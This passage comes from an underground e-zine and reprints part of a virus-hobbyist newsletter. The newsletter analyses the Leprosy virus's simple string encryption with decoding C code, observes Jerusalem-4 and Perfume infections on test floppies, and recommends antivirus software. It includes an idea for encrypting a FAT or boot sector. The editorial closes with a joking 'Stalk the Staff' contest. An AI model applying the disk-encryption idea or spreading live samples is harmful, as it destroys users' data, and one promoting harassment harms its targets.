virus's own code, and AH = 0x40 is the DOS write function. Nothing moves the
file pointer first, so the 666 bytes land at offset 0 and overwrite the
start of the host rather than being appended to it: the original program is
destroyed, and a host longer than 666 bytes does not even change size.
Finally restore_timestamp() puts the original date and time back with
function 57H while the handle is still open, and close_handle() closes it.
This is also why healthy() only has to compare the first 20 bytes of a file
with the virus's own code to tell an infected file from a clean one.

-----------------------------------------------------------------------------
The Method Of Encryption:
-----------------------------------------------------------------------------

void print_s( char *s )
{
    char *p = s;

    while ( *p ) {                     /* Subtract 10 from every character. */
        *p -= 10;
        p++;
    }
    _DX = (int) s;                     /* Set DX to point to adjusted string. */
    _AH = 0x09;                        /* Set DOS function number. */
    asm int 21H;                       /* Call DOS interrupt. */
    return;
}

-----------------------------------------------------------------------------

The above function used in "Leprosy", called "print_s", accepts one
parameter, a string of text, like these ones defined at the beginning of
the Leprosy source code:

-----------------------------------------------------------------------------

char *virus_msg[3] = {
    CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
    CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
    CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};

-----------------------------------------------------------------------------

Note: CRLF is defined as "\x17\x14" at the beginning of the source. Those
are not the ASCII codes for carriage return (0x0D) and line feed (0x0A) but
those codes plus 10: the strings are stored already encrypted, CRLF
included, and print_s takes the 10 off again before DOS ever sees them.

-----------------------------------------------------------------------------

When a string is passed to the "print_s" function, it is decrypted in place
and then printed with DOS function 09H, which prints up to a '$'; the '.'
(0x2E) at the end of each string is that '$' (0x24) plus 10.

    print_s(virus_msg[0]);
    print_s(virus_msg[1]);
    print_s(virus_msg[2]);

would result in the following being printed to the screen:

------------------------------------------------------------
    NEWS FLASH!!  Your system has been infected with the
    incurable decay of LEPROSY 1.00, a virus invented by
    PCM2 in June of 1990.  Good luck!
-----------------------------------------------------------

The compiler I currently use does not accept inline assembly code as the
author of Leprosy had in his source, so I modified the "print_s" function
so I could compile it. For those interested, I use Microsoft Quick C
(C) Microsoft.

-----------------------------------------------------------

/* NOTE: I removed the . from the end of each message because that is     */
/* a $ when decrypted, and the $ to terminate the string is only          */
/* required for the assembly version of the "print_s" function.           */
/* Also: the hexadecimal constants in the strings decrypt as follows:     */
/* \x13 = TAB, \x7f = u, \x83 = y, \x81 = w, \x80 = v                     */

#include <stdio.h>

#define CRLF "\x17\x14"

/* Arrays rather than pointers to string literals: print_s modifies the   */
/* text in place, and writing into a literal is undefined behaviour on    */
/* compilers newer than Quick C.                                          */
char virus_msg[3][80] = {
    CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro",
    CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83",
    CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14"
};

void print_s( char *s );

int main( void )
{
    print_s( virus_msg[0] );
    print_s( virus_msg[1] );
    print_s( virus_msg[2] );
    return 0;
}

void print_s( char *s )
{
    char *p = s;

    while ( *p ) {                     /* Subtract 10 from every character. */
        *p -= 10;
        p++;
    }
    printf( "%s\n", s );               /* printf replaces INT 21H/09H. */
}

-----------------------------------------------------------------------------

*p -= 10; is what does it all. It subtracts 10 from each character, which
decrypts the stored text; the same line can be used either way. If you
change it to:

    *p += 10;

it will then encrypt. You can also change it to:

    *p -= rand() % 35000;     /* #include <stdlib.h> for "rand()" */

and it will change the value it subtracts every time it passes through the
"while" loop, or you can change it to any value you like. Two things to keep
in mind with the rand() version: whoever decrypts has to call srand() with
the same seed and walk the same sequence, or the text is gone for good, and
since the result is stored in a char only the low 8 bits of each rand()
value matter, so % 35000 (larger than any value rand() returns on a 16-bit
compiler) adds nothing.

-----------------------------------------------------------------------------

This method of encryption can be used to encrypt files, file allocation
tables, boot sectors, etc. All you need is a function that reads and writes
any of the three. For instance, read the contents of the File Allocation
Table, pass the sectors through the print_s shift, and then write the
encrypted sectors back to the File Allocation Table. Note that print_s as
written stops at the first zero byte, and a FAT or boot sector is full of
them, so the loop has to run over a byte count rather than to a terminating
NUL. Also, a shift by a constant is a Caesar cipher with 255 possible keys:
it keeps the strings out of a casual hex dump and stops a scanner matching
on the plain text, but it can be broken by trying every key, and the key
sits in the code anyway. I don't suggest doing this to your hard drive, or
anyone else's, for it will result in either you or the other person having
to crack the encryption and restore the FAT manually, or formatting the hard
drive and replacing all the files.
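The print_s shift as a byte cipher, as an added example that is not part of the original article or the Leprosy source. The first ciphertext in it is virus_msg[0] as printed above; the other inputs, the function names, the seed values and the 0xF6 test byte are constructed here. It shows the decryption of that string up to the DOS '$', why a NUL-terminated loop cannot encrypt a FAT or boot sector, and what the rand() variant needs in order to be reversible.

```c
/* Added example, not from the Leprosy source or the article: the print_s()
 * shift as a byte cipher over an explicit length, with the checks a reader
 * wants before pointing it at a FAT or boot sector.  msg0_enc is virus_msg[0]
 * as printed on this page; the other inputs, the function names and the
 * seed values are constructed for this example. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define KEY 10            /* print_s() subtracts this from every byte */

/* Add delta to every byte, mod 256.  -KEY decrypts, +KEY encrypts.
 * Takes a length instead of stopping at NUL, unlike print_s(). */
void shift_bytes(unsigned char *buf, size_t len, int delta)
{
    for (size_t i = 0; i < len; i++)
        buf[i] = (unsigned char)(buf[i] + delta);
}

/* virus_msg[0] from the article, CRLF prefix dropped.  Its last byte '.'
 * decrypts to '$', the terminator DOS INT 21H/09H expects. */
static const unsigned char msg0_enc[] =
    "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.";

/* Decrypt msg0 and return it as a C string, cut at the DOS '$'. */
const char *decrypt_leprosy_msg0(void)
{
    static unsigned char out[sizeof msg0_enc];
    size_t n = sizeof msg0_enc - 1;           /* exclude C's trailing NUL */
    memcpy(out, msg0_enc, sizeof msg0_enc);
    shift_bytes(out, n, -KEY);
    unsigned char *dollar = memchr(out, '$', n);
    if (dollar) *dollar = '\0';
    return (const char *)out;
}

/* Why print_s()'s while(*p) loop is not a file or FAT encryptor: a plaintext
 * byte of 0xF6 becomes 0x00 after +10, so strlen() sees a truncated buffer. */
size_t strlen_after_encrypt(void)
{
    unsigned char buf[] = { 'a', 'b', 'c', 0xF6, 'd', 'e', 'f', 0 };
    shift_bytes(buf, 7, +KEY);
    return strlen((const char *)buf);         /* 3, not 7 */
}

/* A length-based round trip survives the embedded 0x00 that strlen() does not. */
int roundtrip_ok(void)
{
    const unsigned char plain[] = { 'a', 'b', 'c', 0xF6, 0x00, 'd', 'e', 'f' };
    unsigned char buf[sizeof plain];
    memcpy(buf, plain, sizeof plain);
    shift_bytes(buf, sizeof plain, +KEY);
    shift_bytes(buf, sizeof plain, -KEY);
    return memcmp(buf, plain, sizeof plain) == 0;
}

/* The article's rand() idea done as a per-byte keystream.  Decryption only
 * works if the receiver re-seeds with the same value; only the low 8 bits
 * of each rand() value matter once the result is stored in a char. */
static void keystream_shift(unsigned char *buf, size_t len, unsigned seed, int sign)
{
    srand(seed);
    for (size_t i = 0; i < len; i++)
        buf[i] = (unsigned char)(buf[i] + sign * (rand() & 0xFF));
}

/* 1 if encrypting with enc_seed and decrypting with dec_seed recovers the text. */
int keystream_roundtrip(unsigned enc_seed, unsigned dec_seed)
{
    const char *plain = "Good luck!";
    unsigned char buf[16];
    size_t n = strlen(plain);
    memcpy(buf, plain, n);
    keystream_shift(buf, n, enc_seed, +1);
    keystream_shift(buf, n, dec_seed, -1);
    return memcmp(buf, plain, n) == 0;
}

int main(void)
{
    printf("%s\n", decrypt_leprosy_msg0());
    printf("strlen after encrypt: %zu (buffer is 7)\n", strlen_after_encrypt());
    printf("length-based round trip: %d\n", roundtrip_ok());
    printf("keystream same seed: %d, wrong seed: %d\n",
           keystream_roundtrip(1990, 1990), keystream_roundtrip(1990, 1991));
    return 0;
}
```

The shift_bytes() form is what you want for anything that is not text: it walks a byte count, so zero bytes in the data neither stop it nor get mistaken for the end of the buffer, and the same call with the opposite sign undoes it.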
If you want to experiment, do it on a floppy, like I did.

-----------------------------------------------------------------------------
The "uncompress" virus
-----------------------------------------------------------------------------

According to the person who uploaded it to the BBS where I got it from, this
virus infects when you uncompress the file. I did not find any indication of
this when I uncompressed the file, called NJERU.ARJ. It is an Arkanoid II:
Revenge Of Doh crack released by FiRM that is infected with a strain of
Jerusalem-4. I ran it and Norton Anti Virus (C) Symantec reported the virus
in memory. I then proceeded to run EDLIN.EXE (C) Microsoft, SYS.COM (C)
Microsoft, COMMAND.COM (C) Microsoft, and ARJ.EXE (C) Robert K. Jung to see
what would happen. These are the results:

    Filename:      Original Size:     Size After Infection:
    ---------------------------------------------------------
    EDLIN.EXE      14,121 bytes       15,936 bytes
    ARJ.EXE        98,968 bytes      100,784 bytes
    SYS.COM        13,440 bytes       15,253 bytes

There were no size changes to COMMAND.COM, nor was it infected. A file was
also created by the virus called "NJVR._OO" that was around 26K but only had
one line in it, an error message concerning the media of the disk. Sorry,
the exact size of the file NJVR._OO and the exact message are not available.
When I attempted to remove the apparent text file using the MS-DOS "DEL"
command, it displayed the error message and tried to write to drive A, which
was write protected at the time. Then it went back to drive B and apparently
did damage to the media. I formatted the disk and it was fine afterwards. I
have never seen anything like this before, a text file being able to do
damage just by attempting to delete it. I guess it wasn't a text file after
all, but I still have no idea how it managed to corrupt the media on drive B.
It also created a file called "N" which was 0 bytes and couldn't be deleted
or read by Norton Anti Virus.
-----------------------------------------------------------------------------
"Suicidal Tendencies" Department.
(Appropriately named department: I can't believe I am deliberately running
a virus on my system)
-----------------------------------------------------------------------------

This section of the newsletter will cover what happened when I ran a virus
on a floppy with MSDOS.SYS, IO.SYS, COMMAND.COM, an overlay file, a .EXE
file and a few other assorted files on it.

The virus of the month award goes to: The Perfume Virus

-----------------------------------------------------------------------------
What Happened:
-----------------------------------------------------------------------------

Filename: PERFUME.COM
Filesize: 806 bytes

Ok, I placed this file on drive B with the following files:

    Filename:         Original Size:
    ----------------------------------
    COMMAND.COM       47845
    MSDOS.SYS         37394
    IO.SYS            33430
    ANSI.SYS           9029
    RAMDRIVE.SYS       5873
    CONFIG.SYS           39
    UNDELETE.EXE      13924
    AUTOEXEC.BAT         69
    15ALL05.DEF       67278
    MICHEL.DEF          456
    NSETUP.OVL          876
    PKUNZIP.EXE       23528
    ----------------------------------

When I ran PERFUME.COM, it displayed the message:

    This is a tiny COM program.

and it infected COMMAND.COM, enlarging it by 765 bytes to 48,610 bytes. It
then proceeded to remove the hidden/system attribute from MSDOS.SYS but
didn't infect it, and then attempted to infect the disk in drive A, which
was write protected at the time. The virus, realizing it couldn't write to
drive A, displayed the message:

    Not ready reading drive A
    Insert disk with \COMMAND.COM in drive A
    Press any key to continue . . .

Now, usually when DOS displays that message, it only needs to READ, and
still could have if the disk was write protected, so evidently the virus
was trying to outsmart me and fool me into thinking that was a DOS message
so it could infect at least one more disk.
I ran Norton Anti Virus v2.0 (C) Symantec, and it reported Perfume in
memory, so I re-booted and ran NAV again. This time it didn't report the
virus being in memory, but it did identify COMMAND.COM and PERFUME.COM as
being infected.

Also: In my search for the virus of the month, I came across a file called
"ISRAELI.ZIP" which I thought to be a virus called "Israeli", but as it
turns out it was a strain of Jerusalem-4, the same as the supposed
"Uncompress virus" discussed earlier. The file was called SORTINFT.EXE and
was 3760 bytes. When I ran it, it did no damage to the disk or files, but
NAV did report Jerusalem-4 in memory, so I re-booted. I then ran NAV again,
and when the screen came up saying who the copy of NAV was registered to,
it said:

    Registered To: Kracked Phile

Weird eh? And that's not all. I went to scan memory, and the little window
came up that displays the name of the current virus being scanned for, but
that's it, no names were displayed. The program appeared to freeze up, and
the disk kept spinning with the drive light on. I re-booted once again and
ran NAV again. The weird letters were still there, but it scanned memory no
problem this time. I exited from NAV and went to drive B to delete files
when I noticed a file called:

    NRVN E._OO

that was 4096 bytes long. Since when does DOS allow spaces in filenames? As
a result I couldn't view it or delete it by typing:

    C>DEL NRVN E._OO

so I typed:

    C>DEL *._OO

and that worked. At one point a message also came up on the screen: "File
Allocation Table Bad, Drive B". I imagine Jerusalem-4 was responsible for
the weird file name and the bad FAT on drive B. I have no idea why NAV was
acting funny, possibly a genuine disk error and not due to a virus, since
the disk was always write protected.

-----------------------------------------------------------------------------

Well, that's it for "Suicidal Tendencies" for this month! I don't recommend
trying this on any computer with a hard drive.
I do not have a hard drive on the machine I do my experimenting on, so if I
am careful and keep the virus isolated to one disk, I have nothing to worry
about.

-----------------------------------------------------------------------------
Anti Viral Software:
-----------------------------------------------------------------------------

Here are some nice virus scanners/anti viral programs to check out:

-----------------------------------------------------------------------------
Scan v89b (C) McAfee                - available on most Public Domain BBSes
Clean v89b (C) McAfee               - available on most Public Domain BBSes
Norton Anti Virus v2.0 (C) Symantec
Central Point Anti Virus (C) Central Point Software
-----------------------------------------------------------------------------

There are a few others, but I think the above four are the best. I use
Norton Anti Virus and Scan.

-----------------------------------------------------------------------------
Some things you should know:
-----------------------------------------------------------------------------

Most people assume that the hard drive in a newly purchased computer, or a
new program still in the shrinkwrap, is always virus free. Well, this is
just not true. The reported cases are few and far between, but today
anything can happen, and it has. A certain computer company shipped out 500
of their computers infected with the Michelangelo virus, which started the
whole panic in the first place. And there have been a few times where
someone bought a brand new program, took it home and started using it, not
expecting it to be infected with a virus. Well, it was. After all, people
create virii, and people work at computer companies and software
distributors. So what's stopping a pissed off employee from infecting a
computer or a program? Nothing at all. How you take this information is
entirely up to you. If you call a BBS and they say they scan for virii,
don't assume that every single file will be virus free; some can sneak
through.
There is also the possibility of an unknown virus that was not detected by
the scanner. Last but not least: ALWAYS BACK UP YOUR DATA!!!

Philosophy Dept:

"Knowledge is power"
    - Francis Bacon, 16th Century Philosopher

"Even if a computer is locked, sealed in concrete, placed in a lead room and
surrounded by armed guards, I'd still have my doubts."

Those aren't the exact words and I forget who said that, but it is quite
appropriate and all too true.

I hope you enjoyed this issue of "Viriisearch", the newsletter dedicated
entirely to computer virii.

Until Next Time......Be Careful!!!

-= Kleptic =-

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 10:::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Conclusion:

We've picked ourselves up off the ground and dusted ourselves off; the next
issue is already shaping up well, and we'll be unveiling the results of our
insane competitions. Details of new sections will be in the next issue, as
well as various other exciting things. These will include a review of the
upcoming Mitnick movie, 'TakeDown', 'Eluding Unix Authentication' and an
interview with other notorious underground figures.

Now, announcing two DoJ competitions, 'Cheesy ASCII Art' and 'Stalk the
Staff'. The ASCII Art competition was inspired by Rue asking his friend
bedlam if he wanted to do a little ASCII map for people going to the Dublin
2600 meeting (the answer is unprintable). For the Art competition we're
looking for dodgy art of a purely ASCII nature: self portraits, maps, sexual
innuendo, anything remotely ASCII-like really. The best selection (or
anything we get if it comes down to it) will be published in either the next
issue or at our convenience. The winner receives a free lifetime
subscription to the DoJ and the respect and admiration of everyone for his
elite ASCII skillz. Send your ASCII submissions to ascii@Rue-the-Day.net and
we'll laugh hideously at your vague attempts...
'Stalk the Staff' is inspired by various people we know and the maniacs who
shamelessly harass them online (and by the personal experiences of one of
the editors). By the way, we mean 'maniacs' in the nicest possible way. For
the stalking competition we're basically looking for all you people out
there that get off on disturbing minor underground celebrities, like
ourselves, to send us emails of your insane (inane?) rants and raves. We're
also looking for amusing stalker stories from anyone who has them. If you
really want to send decapitated soft toys with 'Rue' written on them or
whatever, then take a photo instead, as we aren't big into snail mail. All
submissions welcomed, get stalking people! Send the submissions to
stalkers@Rue-the-Day.net and you'll never hear from us again...

Well, there you have it. The first issue of The DoJ. Be sure to look out for
future issues as they are on their way. But to make sure we get there, we
need your help. Fiction, articles, poetry, stories, fact, rumour, advice and
even letters will all help get the next issue out. Rue and myself wrote a
lot for this issue, but in the future we hope to be able to leave most of it
in your hands. Submit anything remotely underground that you might have:
underground instructions, warnings, tales or whatever else you have.

This issue wouldn't have been possible without the help of ethercat for the
site, rOTTEN for the art, and Digital Avatar and Kleptic for their
submissions. Thank you. Also, if you have an underground site or newsletter
worth a mention, then contact us. You can mail the DoJ at
discordia@Rue-the-Day.net and we will reply as soon as possible.

Nothing more really to be said, hope you enjoyed Issue 0 and got something
from it. Preferably not contagious.

The following cultural content helped inspire us: The Dead Kennedys,
Placebo, Scraping Foetus off The Wheel, A Tribe Called Quest, The Smashing
Pumpkins, La Haine, Albino Alligator and Things to Do in Denver When You're
Dead.
Thanks and cya next time... And remember not to eat those big white mints!

Hail Discordia!

Cronus and Rue-the-Day
Editors